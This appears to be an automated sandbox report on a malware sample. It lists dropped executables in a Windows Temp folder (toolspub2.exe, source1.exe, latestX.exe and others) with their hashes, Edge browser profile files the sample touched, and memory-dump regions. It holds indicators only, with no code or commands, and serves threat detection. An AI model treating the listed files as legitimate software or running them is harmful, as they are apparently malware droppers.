SHA512 84b13853a888d1c7fb7ffbe0885fc7fe66237e46234ee0b95ba4fc31c14d94e8f7c7506d42fa70aab1b2c4aa744bd8043048c0e6ae75dd31da7c3089b0c0599d

C:\Users\Admin\AppData\Local\Temp\10B.exe

MD5 1f353056dfcf60d0c62d87b84f0a5e3f
SHA1 c71a24f90d3ca5a4e26ad8c58db1fc078a75a8f0
SHA256 f30654f4b2b72d4143616a3c2bb3b94b78a9726868b3dfa302ba36892e889d0e
SHA512 84b13853a888d1c7fb7ffbe0885fc7fe66237e46234ee0b95ba4fc31c14d94e8f7c7506d42fa70aab1b2c4aa744bd8043048c0e6ae75dd31da7c3089b0c0599d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 699e3636ed7444d9b47772e4446ccfc1
SHA1 db0459ca6ceeea2e87e0023a6b7ee06aeed6fded
SHA256 9205233792628ecf0d174de470b2986abf3adfed702330dc54c4a76c9477949a
SHA512 d5d4c08b6aec0f3e3506e725decc1bdf0b2e2fb50703c36d568c1ea3c3ab70720f5aec9d49ad824505731eb64db399768037c9f1be655779ed77331a7bab1d51

memory/5584-299-0x0000000071E10000-0x00000000725C0000-memory.dmp

memory/5584-300-0x00000000008D0000-0x00000000017FA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

memory/4248-336-0x0000000071E10000-0x00000000725C0000-memory.dmp

memory/4248-341-0x0000000000440000-0x0000000000956000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/4248-345-0x0000000005270000-0x0000000005280000-memory.dmp

memory/4248-346-0x0000000005200000-0x0000000005201000-memory.dmp

memory/5584-348-0x0000000071E10000-0x00000000725C0000-memory.dmp

memory/4248-347-0x00000000054C0000-0x000000000555C000-memory.dmp

memory/5772-351-0x00000000023A0000-0x00000000023A9000-memory.dmp

memory/3380-352-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3380-354-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3380-355-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

memory/5772-350-0x00000000025B0000-0x00000000026B0000-memory.dmp

memory/2696-357-0x0000000004240000-0x0000000004642000-memory.dmp

memory/2696-358-0x0000000004750000-0x000000000503B000-memory.dmp

memory/4248-359-0x0000000071E10000-0x00000000725C0000-memory.dmp

memory/2696-360-0x0000000000400000-0x000000000266D000-memory.dmp